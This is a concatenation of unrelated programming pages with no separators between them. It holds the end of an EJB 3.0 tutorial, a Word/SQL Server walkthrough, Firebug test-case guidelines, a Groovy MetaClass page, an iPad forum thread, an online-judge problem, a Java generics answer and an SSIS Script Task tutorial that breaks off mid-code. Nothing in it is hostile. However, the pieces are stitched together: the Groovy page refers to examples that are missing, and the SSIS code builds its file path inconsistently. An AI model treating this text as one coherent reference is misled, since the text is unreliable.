    public class Employee implements java.io.Serializable {
        private int empId;
        private String eName;
        private double sal;

        @Id
        @Column(name="EMPNO", primaryKey=true)
        public int getEmpId() {
            return empId;
        }
        public void setEmpId(int empId) {
            this.empId = empId;
        }
        public String getEname() {
            return eName;
        }
        public void setEname(String eName) {
            this.eName = eName;
        }
        public double getSal() {
            return sal;
        }
        public void setSal(double sal) {
            this.sal = sal;
        }
        public String toString() {
            StringBuffer buf = new StringBuffer();
            buf.append("Class:").append(this.getClass().getName()).append(" :: ")
               .append(" empId:").append(getEmpId()).append(" ename:").append(getEname())
               .append("sal:").append(getSal());
            return buf.toString();
        }
    }

Message-driven beans

A message-driven bean (MDB) provides a way to implement asynchronous communication that is easier than using the Java Message Service (JMS) directly. MDBs are created to receive asynchronous JMS messages. The container handles most of the setup work required for JMS queues and topics and dispatches each message to the matching MDB. MDBs allow a J2EE application to send asynchronous messages that the application can then process. You specify that a bean is a message-driven bean by implementing the javax.jms.MessageListener interface and annotating the bean with @MessageDriven.

Message-driven bean example

    import javax.ejb.MessageDriven;
    import javax.ejb.ActivationConfigProperty;
    import javax.ejb.Inject;
    import javax.jms.*;
    import java.util.*;
    import javax.ejb.TimedObject;
    import javax.ejb.Timer;
    import javax.ejb.TimerService;

    @MessageDriven(
        activationConfig = {
            @ActivationConfigProperty(propertyName="connectionFactoryJndiName",
                propertyValue="jms/TopicConnectionFactory"),
            @ActivationConfigProperty(propertyName="destinationName",
                propertyValue="jms/myTopic"),
            @ActivationConfigProperty(propertyName="destinationType",
                propertyValue="javax.jms.Topic"),
            @ActivationConfigProperty(propertyName="messageSelector",
                propertyValue="RECIPIENT = 'MDB'")
        }
    )
    /**
     * A simple message-driven bean that listens on a configurable JMS queue
     * or topic and is notified through its onMessage() method whenever a
     * message is sent to that queue or topic. The bean prints the contents
     * of the message.
     */
    public class MessageLogger implements MessageListener, TimedObject {

        @Inject javax.ejb.MessageDrivenContext mc;

        public void onMessage(Message message) {
            System.out.println("onMessage() - " + message);
            try {
                String subject = message.getStringProperty("subject");
                String inmessage = message.getStringProperty("message");
                System.out.println("Message received\n\tDate: " + new java.util.Date()
                    + "\n\tSubject: " + subject + "\n\tMessage: " + inmessage + "\n");
                System.out.println("Creating Timer a single event timer");
                TimerService ts = mc.getTimerService();
                Timer timer = ts.createTimer(30000, subject);
                System.out.println("Timer created by MDB at: "
                    + new Date(System.currentTimeMillis()) + " with info: " + subject);
            } catch (Throwable ex) {
                ex.printStackTrace();
            }
        }

        public void ejbTimeout(Timer timer) {
            System.out.println("EJB 3.0: Timer with MDB");
            System.out.println("ejbTimeout() called at: "
                + new Date(System.currentTimeMillis()));
            return;
        }
    }

Using EJBs

A client is an application that accesses a bean. It does not have to live in the client tier; it can be a standalone application, a JSP, a servlet, or another EJB. A client accesses the methods in an EJB through the bean's remote or local interface, depending mainly on whether the client and the bean run in the same JVM or in different ones. These interfaces define the bean's methods, while the bean class actually implements them. When a client calls a method on the bean class, the container generates a proxy for the bean, called the remote object or the local object. The remote or local object receives the request, delegates it to the corresponding bean instance, and returns the result to the client. To call a method in a bean, the client looks the bean up by the name defined in the EJB deployment descriptor. In the following example, the client uses a Context object to look up the bean named "StateLessejb".

EJB client example

    import javax.naming.Context;
    import javax.naming.InitialContext;

    /**
     * A simple bean client that calls a method of the stateless session bean.
     */
    public class CalculateejbClient {
        public static void main(String[] args) throws Exception {
            Context context = new InitialContext();
            CalculateEJB myejb =
                (CalculateEJB) context.lookup("java:comp/env/ejb/CalculateEJB");
            myejb.incrementValue();
        }
    }

Summary

Developing enterprise JavaBeans with EJB 3.0 is fairly easy. The specification uses metadata annotations to define the type of a bean and the methods exposed to clients. So whether you are creating a session bean that performs a specific task or mapping a table to an entity bean to update data, you can treat them like ordinary Java objects and interfaces, exposing methods to clients through annotations on the business methods. Now that you understand the basics of EJBs, visit the EJB 3.0 Resources Page on OTN to learn more.

Articles bearing this notice are original work by the blog author Caoer (草儿); please credit the source and the original author when indexing, bookmarking, or reposting. Many thanks.

posted on 2007-09-02 14:22 by 草儿, 22453 reads, 1 comment. Categories: software architecture, Java web applications

Feedback

# re: EJB3.0入门 (2008-06-27 18:51, sean): The test failed on JBoss.
Walkthrough: Building a Word Document Using SQL Server Data

Office 2003

Mary Chipman
MCW Technologies, LLC

September 2003

Applies to:
    Microsoft® Visual Studio® Tools for the Microsoft Office System
    Microsoft Office Word 2003
    Microsoft Visual Studio .NET 2003

Summary: Shows how you can create customized documents based on Microsoft SQL Server data in code by taking advantage of bookmarks in a Microsoft Office Word 2003 document or template. (14 printed pages)

Contents
    Introduction
    Prerequisites
    Getting Started
    Creating the Document Header
    Connecting to SQL Server and Inserting the Data
    Conclusion

Introduction

In this walkthrough, you will first create a Microsoft® Office Word 2003 document that contains bookmarks as the location for inserting text retrieved from the Microsoft SQL Server Northwind sample database. You will then use ADO.NET to connect to and retrieve the data. You'll insert the data in the Word document at the specified bookmark.

Prerequisites

To complete this walkthrough, the following software and components must be installed on the development computer:

- Microsoft Visual Studio .NET 2003 or Microsoft Visual Basic .NET Standard 2003
- Microsoft Visual Studio Tools for the Microsoft Office System
- Microsoft Office Professional Edition 2003
- Microsoft SQL Server or Microsoft SQL Server Desktop Engine (MSDE) 7.0 or 2000, with the Northwind sample database installed. This demonstration assumes that you have set up SQL Server/MSDE allowing access using integrated security.

Tip   This demonstration assumes that if you're a Visual Basic .NET programmer, you've set the Option Strict setting in your project to On (or have added the Option Strict statement to each module in your project), although it is not required. Setting the Option Strict setting to On requires a bit more code, as you see, but it also ensures that you do not perform any unsafe type conversions. You can get by without it, but in the long run, the discipline required by taking advantage of this option far outweighs the difficulties it adds as you write code.

Getting Started

First you need to create a Word Document project using Microsoft Visual Studio Tools for the Microsoft Office System.

To create a Word Document project

1. From the File menu, point to New, and then click Project to display the New Project dialog box.
2. In the Project Types pane, expand Microsoft Office System Projects, and then select Visual Basic Projects or Visual C# Projects.
3. In the Templates pane, select Word Document.
4. Name the project BuildWordDocSQL, and store it in a convenient local path.
5. Accept the defaults in the Microsoft Office Project Wizard, and click Finish to create the project. Visual Studio .NET opens the ThisDocument.vb or ThisDocument.cs file in the Code Editor for you.

Creating the Document Header

In this example, you will create a procedure that inserts and formats the document header, and then creates a Bookmark as a marker for inserting text from the Northwind database to create a phone list of suppliers. You will then call the procedure from the Open event handler for the ThisDocument object, although you could also invoke the procedure from a button, menu, or form. All the steps in this section work with a procedure named CreateHeader, which you will create in the first step.

To create a document header
1. In the OfficeCodeBehind class, create a procedure called CreateHeader and create variables as needed:

    ' Visual Basic
    Private Sub CreateHeader()
        Dim rng As Word.Range
    End Sub

    // C#
    private void CreateHeader()
    {
        Word.Range rng;
        Object start = Type.Missing;
        Object end = Type.Missing;
        Object unit = Type.Missing;
        Object count = Type.Missing;
    }

2. Add code to the CreateHeader procedure, clearing any existing contents of the document and setting the section to landscape orientation:

    ' Visual Basic
    ' Clear the contents of the document.
    ThisDocument.Range.Delete()
    ThisDocument.Sections(1).PageSetup. _
        Orientation = Word.WdOrientation.wdOrientLandscape

    // C#
    // Clear the contents of the document.
    ThisDocument.Range(ref start, ref end).Delete(ref unit, ref count);
    ThisDocument.Sections[1].PageSetup.Orientation =
        Word.WdOrientation.wdOrientLandscape;

3. Add code that sets up an array of locations for tab settings within the document:

    ' Visual Basic
    ' Set up tab locations.
    Dim tabStops() As Single = {4, 6}

    // C#
    // Set up tab locations.
    Single[] tabStops = new Single[] {4, 6};

4. Add code to the CreateHeader procedure that creates a Range object consisting of the empty paragraph mark that is the only character in the document:

    ' Visual Basic
    rng = ThisDocument.Range(0, 0)

    // C#
    start = 0;
    end = 0;
    rng = ThisDocument.Range(ref start, ref end);

5. Add code to insert the title text in the document and format it:

    ' Visual Basic
    ' Insert the header.
    rng.InsertBefore("Supplier Phone List")
    rng.Font.Name = "Verdana"
    rng.Font.Size = 16
    rng.InsertParagraphAfter()
    rng.InsertParagraphAfter()

6. Add code to reset the active range, and retrieve the paragraph format for the range:

    ' Visual Basic
    ' Create a new range at the insertion point.
    rng.SetRange(Start:=rng.End, End:=rng.End)
    Dim fmt As Word.ParagraphFormat = rng.ParagraphFormat

    // C#
    // Create a new range at the insertion point.
    rng.SetRange(rng.End, rng.End);
    Word.ParagraphFormat fmt = rng.ParagraphFormat;

7. Add code to set up the tabs for the column headers:

    ' Visual Basic
    ' Set up the tabs for the column headers.
    fmt.TabStops.ClearAll()
    fmt.TabStops.Add( _
        ThisApplication.InchesToPoints(tabStops(0)), _
        Word.WdTabAlignment.wdAlignTabLeft, _
        Word.WdTabLeader.wdTabLeaderSpaces)
    fmt.TabStops.Add( _
        ThisApplication.InchesToPoints(tabStops(1)), _
        Word.WdTabAlignment.wdAlignTabLeft, _
        Word.WdTabLeader.wdTabLeaderSpaces)

    // C#
    // Set up the tabs for the column headers.
    Object alignment = Word.WdTabAlignment.wdAlignTabLeft;
    Object leader = Word.WdTabLeader.wdTabLeaderSpaces;
    fmt.TabStops.ClearAll();
    fmt.TabStops.Add(ThisApplication.InchesToPoints(tabStops[0]),
        ref alignment, ref leader);
    alignment = Word.WdTabAlignment.wdAlignTabLeft;
    leader = Word.WdTabLeader.wdTabLeaderSpaces;
    fmt.TabStops.Add(ThisApplication.InchesToPoints(tabStops[1]),
        ref alignment, ref leader);

8. Add code to create the Company Name, Contact, and Phone headings, separated by tabs:

    ' Visual Basic
    ' Insert the column header text and formatting.
    rng.Text = _
        "Company Name" & ControlChars.Tab & _
        "Contact" & ControlChars.Tab & _
        "Phone Number"
    rng.Font.Name = "Verdana"
    rng.Font.Size = 10
    rng.Font.Bold = CLng(True)
    rng.Font.Underline = Word.WdUnderline.wdUnderlineSingle
rng.Text = "Company Name\tContact\tPhone Number"; rng.Font.Name = "Verdana"; rng.Font.Size = 10; rng.Font.Bold = Convert.ToInt32(true); rng.Font.Underline = Word.WdUnderline.wdUnderlineSingle; 9. Add code to create a range at the current insertion point, and retrieve the paragraph format associated with this range: ' Visual Basic ' Create a new range at the insertion point. rng.InsertParagraphAfter() rng.SetRange(Start:=rng.End, End:=rng.End) fmt = rng.ParagraphFormat // C# // Create a new range at the insertion point. rng.InsertParagraphAfter(); rng.SetRange(rng.End, rng.End); fmt = rng.ParagraphFormat; 10. Add code to recreate the same tab stops at the new insertion point, but with dot leaders instead of spaces: ' Visual Basic ' Set up the tabs for the columns. fmt.TabStops.ClearAll() fmt.TabStops.Add( _ ThisApplication.InchesToPoints(tabStops(0)), _ Word.WdTabAlignment.wdAlignTabLeft, _ Word.WdTabLeader.wdTabLeaderDots) fmt.TabStops.Add( _ ThisApplication.InchesToPoints(tabStops(1)), _ Word.WdTabAlignment.wdAlignTabLeft, _ Word.WdTabLeader.wdTabLeaderDots) // C# // Set up the tabs for the columns. fmt.TabStops.ClearAll(); alignment = Word.WdTabAlignment.wdAlignTabLeft; leader = Word.WdTabLeader.wdTabLeaderDots; fmt.TabStops.Add(ThisApplication.InchesToPoints(tabStops[0]), ref alignment, ref leader); fmt.TabStops.Add(ThisApplication.InchesToPoints(tabStops[1]), ref alignment, ref leader); 11. Add code to create a Bookmark named Data at the insertion point, and insert a paragraph after the Bookmark. ' Visual Basic ' Insert a bookmark to use for the inserted data. ThisDocument.Bookmarks.Add( _ Name:="Data", Range:=DirectCast(rng, System.Object)) rng.InsertParagraphAfter() // C# // Insert a bookmark to use for the inserted data. Object range = rng; ThisDocument.Bookmarks.Add("Data", ref range); rng.InsertParagraphAfter(); 12. Add code in the ThisDocument_Open() event handler to call the CreateHeader procedure, turning screen updating off and back on again: ' Visual Basic Private Sub ThisDocument_Open() Handles ThisDocument.Open Try ThisApplication.ScreenUpdating = False CreateHeader() Finally ThisApplication.ScreenUpdating = True End Try End Sub // C# protected void ThisDocument_Open() { try { ThisApplication.ScreenUpdating = false; CreateHeader(); } finally { ThisApplication.ScreenUpdating = true; } } Save your work and test by running the project. You should see the headings for the phone list, as shown in Figure 1. If you have turned on the display of Bookmarks, you should see the Data Bookmark as an I-beam directly under Company Name. Close the document when you're done (you can save the changes if you like) and return to Visual Studio .NET. Figure 1. The phone list before the data is added Connecting to SQL Server and Inserting the Data Once you have set up the phone list, you will create a new procedure to connect to the Suppliers table in the Northwind SQL Server database. You will then insert the data at the bookmark you defined. You will call the procedure from the Open event handler for the ThisDocument object. To insert data from the database 1. Scroll to the top of the open code file and type the following statement: ' Visual Basic Imports System.Data.SqlClient // C# using System.Data; using System.Data.SqlClient; 2. Scroll to the end of the CreateHeader procedure in the OfficeCodeBehind class, and add a new procedure named RetrieveSuppliers: ' Visual Basic Private Sub RetrieveSuppliers() End Sub // C# private void RetrieveSuppliers() { } 3. 
Within RetrieveSuppliers, add code to create the variables your procedure will need: ' Visual Basic Dim cnn As SqlConnection Dim dr As SqlDataReader Dim cmd As SqlCommand Dim rng As Word.Range Dim sw As New System.IO.StringWriter // C# SqlConnection cnn; SqlCommand cmd; SqlDataReader dr = null; Word.Range rng; System.IO.StringWriter sw = new System.IO.StringWriter(); 4. Add code to create a String variable to create a SELECT statement, selecting the CompanyName, ContactName, and Phone fields from the Suppliers table. ' Visual Basic ' Set up the command text: Dim strSQL As String = _ "SELECT CompanyName, ContactName, Phone " & _ "FROM Suppliers ORDER BY CompanyName" // C# // Set up the command text: string strSQL = "SELECT CompanyName, ContactName, Phone " + "FROM Suppliers ORDER BY CompanyName"; 5. Add code to create an exception-handling block that displays the Exception.Message value using the MessageBox.Show method if an exception occurs: ' Visual Basic Try Catch ex As Exception MessageBox.Show(ex.Message, ThisDocument.Name) Finally End Try // C# try { } catch (Exception ex) { MessageBox.Show(ex.Message, ThisDocument.Name); } finally { } 6. Add code in the Try block to open the connection to the local SQL Server database: ' Visual Basic ' Create the connection: cnn = New SqlConnection( _ "Data Source=(local);Database=Northwind;Integrated Security=True") cnn.Open() // C# // Create the connection: cnn = new SqlConnection( "Data Source=(local);Database=Northwind;" + "Integrated Security=true"); cnn.Open(); 7. Add code to create the Command object and retrieve the data reader: ' Visual Basic ' Create the command and retrieve the data reader: cmd = New SqlCommand(strSQL, cnn) dr = cmd.ExecuteReader(CommandBehavior.CloseConnection) // C# // Create the command and retrieve the data reader: cmd = new SqlCommand(strSQL, cnn); dr = cmd.ExecuteReader(CommandBehavior.CloseConnection); 8. Add code to loop through the data, building up a string containing the data and the tab separators: ' Visual Basic ' Loop through the data, creating tab-delimited output: While dr.Read() sw.WriteLine("{0}{1}{2}{3}{4}", _ dr(0), ControlChars.Tab, _ dr(1), ControlChars.Tab, dr(2)) End While // C# // Loop through the data, creating tab-delimited output: while (dr.Read()) { sw.WriteLine("{0}\t{1}\t{2}", dr[0], dr[1], dr[2]); } 9. Add code to insert the delimited string into the bookmark you created earlier, and format the text: ' Visual Basic ' Work with the previously created bookmark: rng = ThisDocument.Bookmarks("Data").Range rng.Text = sw.ToString() rng.Font.Name = "Verdana" rng.Font.Size = 10 // C# // Work with the previously created bookmark: Object item = "Data"; Word.Bookmark bmk = (Word.Bookmark) ThisDocument.Bookmarks.get_Item(ref item); rng = bmk.Range; rng.Text = sw.ToString(); rng.Font.Name = "Verdana"; rng.Font.Size = 10; 10. Add code in the Finally block to clean up any open data objects: ' Visual Basic If Not dr Is Nothing Then dr.Close() End If // C# if (dr != null ) { dr.Close(); } 11. 
Add code in the ThisDocument.Open event handler to call the procedure, after the code that calls the CreateHeader procedure, so that the procedure looks like the following: ' Visual Basic Private Sub ThisDocument_Open() Handles ThisDocument.Open Try ThisApplication.ScreenUpdating = False CreateHeader() RetrieveSuppliers() Finally ThisApplication.ScreenUpdating = True End Try End Sub // C# protected void ThisDocument_Open() { try { ThisApplication.ScreenUpdating = false; CreateHeader(); RetrieveSuppliers(); } finally { ThisApplication.ScreenUpdating = true; } } Save your work and test by running the project. Figure 2 shows a partial view of the completed phone list. Figure 2. The completed supplier phone list Conclusion In this walkthrough, you learned how you can take advantage of bookmarks in a Word document or template to create customized documents based on SQL Server data in code. Using Visual Studio Tools for the Microsoft Office System to create your project and ADO.NET to connect to the data, you can insert data into a Word document at a specified bookmark. Show: © 2015 Microsoft
Creating a Test Case
We need a simple page, that we can open in the browser and use for manual testing to work on an issue.

General info

We can only work on issues, that we can reproduce. Therefore it is very important to have simple test cases for the bug you're seeing or the feature you are missing in Firebug.

A test case MUST include precise step by step instructions how to reproduce it and a description of what you expect to see. Also, if your steps to reproduce require a file, then please provide that file instead of posting lines of code. This makes it a lot easier for other people to reproduce your test case.

If you provide a test case file, you should also provide the following additional information:

• The issue number
• The issue summary
• Observed results (in case of bugs)
• Contact information (so we can get back to you in case of questions)

Manual tests

How to create

To create a manual test case you can either provide a publicly accessible URL or create a specific test case file. Please note again, that it is essential to give clear steps to reproduce your issue.

You can add additional material like screenshots, videos, links to discussions etc. or offer RDP access to your computer. They are not a replacement for a proper test case, though, since others should also be able to reproduce the problem on their own.

Test cases for enhancements

Also for enhancements we want you to create a simple test case, so we are able to implement a feature/make a change as you imagine it. So how can you provide a test case for something, that doesn't exist yet? Pretty simple: Like for bug descriptions you can create step by step instructions of how you imagine the changes.

Example

You want a new option inside the Net Panel, that allows you to copy the file name of a request.

1. Open Firebug on this page
2. Enable and switch to the Net panel
3. Reload the page via F5
4. Right-click the request for "Creating_a_Test_Case"
   => The context menu for the request appears.
5. Click the menu item "Copy file name" inside the context menu (not existing yet)
   => The file name "Creating_a_Test_Case" should be copied to the clipboard

Templates

To help you with creating test cases we provide some templates. You can use one of the templates below:

• Default HTML template (https://getfirebug.com/tests/templates/manual/issueXXXX.html) - Common template used for normal purposes
• Enhanced HTML template (https://getfirebug.com/tests/templates/manual/issueXXXXSeveralCases.html) - Template including two cases and some example elements

To adjust these templates please follow the steps below:

1. Replace "xxxx" by the number of your issue
2. Replace "Issue summary" by the title of your issue
3. Put inspectable elements, form fields etc. into the "content" section
4. Add the exact steps to reproduce your issue under "Steps to reproduce"
5. Describe the currently seen result under "Observed result"
6. Describe what you would expect to see under "Expected result"
7. Add your contact information
8. Remove all template comments

Examples

There are already some examples, which can be used as reference.

Automated tests

Requirements

To run the FBTests you first need to install FBTest.
In order to run the test suite on your machine you'll need to set up a local web server. For example you can use the Apache HTTP Server. To be able to access the FBTests through the web server, you have to create a mapping. For Apache you can achieve this by adding an alias to your httpd.conf file, which could look like this:

# Firebug FBTests
Alias /fbtests "/path/to/your/fbtests/folder"
<Directory "/path/to/your/fbtests/folder">
    Options Indexes FollowSymLinks
    AllowOverride all
    Order allow,deny
    Allow from all
</Directory>

Doing so you can access the test cases via http://127.0.0.1/fbtests.

How to create

For the creation of an automated test, which will be part of the FBTest suite, you need at least two parts: an HTML file and a JavaScript file, which executes the test.

To create the HTML page for the automated test case please follow the steps for the manual tests. The only thing you do not need for FBTests is the section with the observed results.

The automated (JavaScript based) test case should include the exact same steps as when manually executing the test case, i.e. instead of calling an internal Firebug function directly you should call the UI functions that will call the internal function. So for example, instead of calling the editNewAttribute() method for a specific node inside the HTML Panel, you should programmatically open the context menu at it and choose the option "New Attribute...". FBTest already provides several APIs which encapsulate such logic, like in this case the function FBTest.executeContextMenuCommand().

Steps for creating FBTests

1. Copy the two templates linked below to a subdirectory named after the issue number of the right group inside the /tests/content/ directory of your local copy of the repository. Example: /tests/content/net/5324/.
2. Add a new line to /tests/content/firebug.html and specify the group, the absolute URL path to the JavaScript file of your test case, a description of the form "Issue xxxx: Issue summary" and the absolute URL path to the HTML page. Example:

   {group: "commandLine", uri: "commandLine/5042/issue5042.js", desc: "Issue 5042: Command Line should not prevent tabbing out when empty", testPage: "commandLine/5042/issue5042.html"}

3. Edit the HTML file following the steps described in the template.
4. Edit the JavaScript file following the steps described in the template. An FBTest normally opens the HTML file in a new browser tab via FBTest.openNewTab(). Furthermore it must contain a call to FBTest.testDone(), which indicates the end of the test.

Templates

Two templates are available for automated tests:

Single tests:
• Default HTML template (https://getfirebug.com/tests/templates/automated/issueXXXX.html) - Common template used for normal purposes
• Template for single tests (https://getfirebug.com/tests/templates/automated/issueXXXX.js) - JavaScript template for single automated tests covering an issue

Multiple tests:
• Enhanced HTML template (https://getfirebug.com/tests/templates/automated/issueXXXXSeveralCases.html) - Template including two cases and some example elements
• Template test suites (https://getfirebug.com/tests/templates/automated/issueXXXXSeveralCases.js) - JavaScript template for several automated tests covering an issue

You will have to adjust this template using the automated test API.

Examples

There are also some examples for how to create automated tests. Also see some live examples:

• Issue 537 (https://getfirebug.com/tests/head/html/style/537/issue537.html)
• Issue 1338 (https://getfirebug.com/tests/head/css/1338/issue1338.html)
• Issue 3652 (https://getfirebug.com/tests/head/css/3652/issue3652.html)
Evaluating the MetaClass runtime

Since 1.1, Groovy supports a much richer set of APIs for evaluating the MetaClass runtime. Using these APIs in combination with ExpandoMetaClass makes Groovy an extremely powerful language for meta-programming.

Finding out methods and properties

To obtain a list of methods (or MetaMethod instances in Groovy speak) for a particular Groovy class, you can inspect its MetaClass. The same can be done for properties.

Using respondsTo and hasProperty

Obtaining a list of methods sometimes is a little more than what you want. It is quite common in meta-programming scenarios to want to find out if an object supports a particular method. Since 1.1, you can use respondsTo and hasProperty to achieve this.

The respondsTo method actually returns a List of MetaMethod instances, so you can use it to both query and evaluate the resulting list.

Note: respondsTo only works for "real" methods and those added via ExpandoMetaClass, and not for cases where you override invokeMethod or methodMissing. It is impossible in these cases to tell if an object responds to a method without actually invoking the method.
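The page's original Groovy snippets did not survive conversion. As a purely illustrative cross-language sketch (Python, not the Groovy API — every name below is hypothetical), the same kinds of runtime capability checks look roughly like this:

# Rough Python analogue of inspecting metaClass.methods and of
# Groovy's respondsTo/hasProperty checks (illustrative only).
class Book:
    title = "Groovy in Action"

    def save(self):
        return "saved"

book = Book()

# ~ listing the methods of a class via its MetaClass
print([name for name in dir(book)
       if callable(getattr(book, name)) and not name.startswith("_")])

# ~ respondsTo: does the object support a particular method?
print(callable(getattr(book, "save", None)))   # True

# ~ hasProperty: does the object have a particular property?
print(hasattr(book, "title"))                  # True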
Hide books

Discussion in 'iPad Help' started by qtwilson, Apr 13, 2012.

qtwilson:
Is there a way to hide books?

twerppoet:
You can delete them. They will still be available in the Purchased tab of the iBooks Store so you can download them again. If you wish to hide them in the iBook Store's Purchased tab just swipe across them and tap the Hide button that appears.

King1968:
Delete not hide? Is there a way to delete totally?
SUSTech Online Judge

Problem 1140: Combine polynomials

Time Limit: 1 Sec   Memory Limit: 128 MB

Description

The linked list is one of the most simple and fundamental data structures, and thus it has a very wide range of applications. For example, a linked list can be used to calculate the sum of two polynomials. Now, given two polynomials by the coefficient and exponent of each term (the exponents of each term are in ascending order), please output the sum of the two polynomials.

Input

The first line will be a positive integer T (T <= 100), which is the number of test cases. For each test case, the first line will be an integer n, which is the number of terms of the first polynomial. Then n lines will be the coefficients and exponents of the terms. After the n + 1 lines, there will be an integer m for the number of terms of the second polynomial, and m lines of (coefficient, exponent) pairs. (0 <= n, m <= 1000, all exponents are in the range [0, 10^9], all coefficients are in the range [-10000, 10000])

Output

For each test case, print the polynomial in ascending order of the exponents. Pay attention to the format of the polynomial.

Sample Input

2
2
1 2
2 3
2
2 2
1 4
2
2 0
-2 1
2
3 1
1 2

Sample Output

3x^2+2x^3+x^4
2+x+x^2
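A minimal solution sketch (Python; hypothetical, not an official judge solution). A dict keyed by exponent stands in for the linked list here, which preserves the merge logic while keeping the sketch short. The handling of negative and fully cancelled sums is an assumption, since the samples don't cover those cases:

import sys

def format_term(coef, exp):
    # Coefficients 1 and -1 drop the digit, except for the constant term.
    if exp == 0:
        return str(coef)
    if coef == 1:
        c = ""
    elif coef == -1:
        c = "-"
    else:
        c = str(coef)
    return c + ("x" if exp == 1 else "x^%d" % exp)

def solve(tokens):
    t = next(tokens)
    lines = []
    for _ in range(t):
        total = {}
        for _ in range(2):                 # two polynomials per test case
            n = next(tokens)
            for _ in range(n):
                coef, exp = next(tokens), next(tokens)
                total[exp] = total.get(exp, 0) + coef
        parts = []
        for exp in sorted(total):
            coef = total[exp]
            if coef == 0:                  # cancelled terms are dropped
                continue
            term = format_term(coef, exp)
            if parts and not term.startswith("-"):
                parts.append("+")
            parts.append(term)
        lines.append("".join(parts) if parts else "0")
    print("\n".join(lines))

if __name__ == "__main__":
    solve(int(tok) for tok in sys.stdin.read().split())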
Creating an instance of a typed class with a variable in Java

Question (Fabian N.):

I have a class with a type:

public class Scan<T extends Data> {
    ...
}

Data is an abstract type, from which I have some implementations. Now I want some kind of chooser for which implementation to use. Is this possible? If yes, which type must the variable have? (I tried with Class, but this does not work.)

Class datatype;
switch (datatypeInt) {
    case 2:
        datatype = Simple3DData.class;
        break;
    case 1:
    default:
        datatype = Simple2DData.class;
}
Scan<datatype> scan = new Scan<>();

(Obviously this does not work.)

I can't instantiate Scan in the switch block, because I will also choose the Scan class at some point dynamically.

EDIT: I see, this is not possible that easily. I will try to convert the code not to use type parameters, instead replacing all my T by Data and passing the Class object as a parameter to my Scan.

Answer:

What you try to achieve cannot work, because type parameters are only used at compile time by the compiler to make sure that your code is compliant with the types defined, in order to avoid getting exceptions of type ClassCastException at runtime. At runtime, type parameters don't even exist anymore due to type erasure, such that your code would be something like this:

Class datatype;
switch (datatypeInt) {
    case 2:
        datatype = Simple3DData.class;
        break;
    case 1:
    default:
        datatype = Simple2DData.class;
}
Scan = new Scan();

Which means that you need to specify the class explicitly, so your code could be something like this:

Class<? extends Data> datatype;
switch (datatypeInt) {
    case 2:
        datatype = Simple3DData.class;
        break;
    case 1:
    default:
        datatype = Simple2DData.class;
}
Scan scan = new Scan(datatype);

A much more OO approach could be to implement the strategy pattern: you could have one scanning strategy per type of data. The code would then be:

ScanStrategy strategy;
switch (datatypeInt) {
    case 2:
        strategy = new Simple3DDataScanner();
        break;
    case 1:
    default:
        strategy = new Simple2DDataScanner();
}
Scan scan = new Scan(strategy);
How to create Excel File Dynamically for Stored Procedure Results in SSIS Package by using Script Task - SSIS Tutorial

Scenario: Download Script

You are working as an ETL Developer / SSIS Developer and you need to create an SSIS Package that should execute a Stored Procedure from a SQL Server database and create an Excel file for the data returned by the Stored Procedure. Let's assume that in this scenario the Stored Procedure does not accept any parameters.

Often Stored Procedures are created to run a bunch of queries to generate final results and load them to an Excel file. Your Stored Procedure might be using pivot, and it can return different columns on each execution. Our SSIS Package should be able to handle this situation: it should always create an Excel file for whatever columns are returned by the Stored Procedure. The Excel file should be generated with a datetime stamp on each execution.

Solution:

If we try to create this SSIS Package with an Excel Destination, it is going to be very hard to handle situations where the number of columns returned by the Stored Procedure changes; we often have to edit the SSIS Package to handle this situation. We are going to use the Script Task instead, so we don't have to worry if the Stored Procedure definition changes. As long as it returns us the data, we will dump it into a new Excel file on each execution. Here is my sample Stored Procedure:

Create Procedure Dbo.usp_TotalSale
AS
BEGIN
    Select * From [dbo].[TotalSale]
END

Log File Information: In case your SSIS Package fails, a log file will be created in the same folder where your Excel file will be created. It will have the same datetime as your Excel file.

Step 1: Create Variables to make your SSIS Package Dynamic

Create your SSIS Package in SSDT (SQL Server Data Tools). Once the SSIS Package is created, create the variables below.

• ExcelFileName: Provide the name of the Excel file that you would like to create
• FolderPath: The folder in which you would like to create the Excel file
• SheetName: Provide the sheet name you would like to have in your Excel file
• StoredProcedureName: Provide the Stored Procedure name (with schema) that you would like to execute and dump data to the newly created Excel file

(Figure: Create Variables in SSIS Package to create Excel file dynamically from Stored Procedure in Script Task)

Step 2: Create ADO.NET Connection in SSIS Package to use in Script Task

Create an ADO.NET Connection Manager so we can use it in the Script Task to get data from SQL Server.

(Figure: Create ADO.NET Connection in SSIS Package to use in Script Task to execute Stored Procedure and dump data to Excel file on each execution)

Step 3: Add Variables to Script Task to use from SSIS Package

Bring the Script Task onto the Control Flow pane in the SSIS Package and open it by double-clicking. Check the check-box in front of each variable to add it to the Script Task.

(Figure: Use variables in Script Task in SSIS Package to generate Excel dynamically from Stored Procedure)

Step 4: Add Script to Script Task Editor in SSIS Package to create Excel file for Stored Procedure results

Click the Edit button and it will open the Script Task Editor. Under #region Namespaces, I have added the code below:

using System.IO;
using System.Data.OleDb;
using System.Data.SqlClient;

Under public void Main() { I have added the code below.
string datetime = DateTime.Now.ToString("yyyyMMddHHmmss");
try
{
    //Declare Variables
    string ExcelFileName = Dts.Variables["User::ExcelFileName"].Value.ToString();
    string FolderPath = Dts.Variables["User::FolderPath"].Value.ToString();
    string StoredProcedureName = Dts.Variables["User::StoredProcedureName"].Value.ToString();
    string SheetName = Dts.Variables["User::SheetName"].Value.ToString();

    ExcelFileName = ExcelFileName + "_" + datetime;

    OleDbConnection Excel_OLE_Con = new OleDbConnection();
    OleDbCommand Excel_OLE_Cmd = new OleDbCommand();

    //Construct ConnectionString for Excel
    string connstring = "Provider=Microsoft.ACE.OLEDB.12.0;" + "Data Source=" + FolderPath + ExcelFileName
        + ";" + "Extended Properties=\"Excel 12.0 Xml;HDR=YES;\"";

    //drop Excel file if exists
    File.Delete(FolderPath + "\\" + ExcelFileName + ".xlsx");

    //USE ADO.NET Connection from SSIS Package to get data from table
    SqlConnection myADONETConnection = new SqlConnection();
    myADONETConnection = (SqlConnection)(Dts.Connections["DBConn"].AcquireConnection(Dts.Transaction)
        as SqlConnection);

    //Load Data into DataTable from SQL Server Table
    // Assumes that connection is a valid SqlConnection object.
    string queryString = "EXEC " + StoredProcedureName;
    SqlDataAdapter adapter = new SqlDataAdapter(queryString, myADONETConnection);
    DataSet ds = new DataSet();
    adapter.Fill(ds);

    //Get Header Columns
    string TableColumns = "";

    // Get the Column List from Data Table so can create Excel Sheet with Header
    foreach (DataTable table in ds.Tables)
    {
        foreach (DataColumn column in table.Columns)
        {
            TableColumns += column + "],[";
        }
    }

    // Replace most right comma from Columnlist
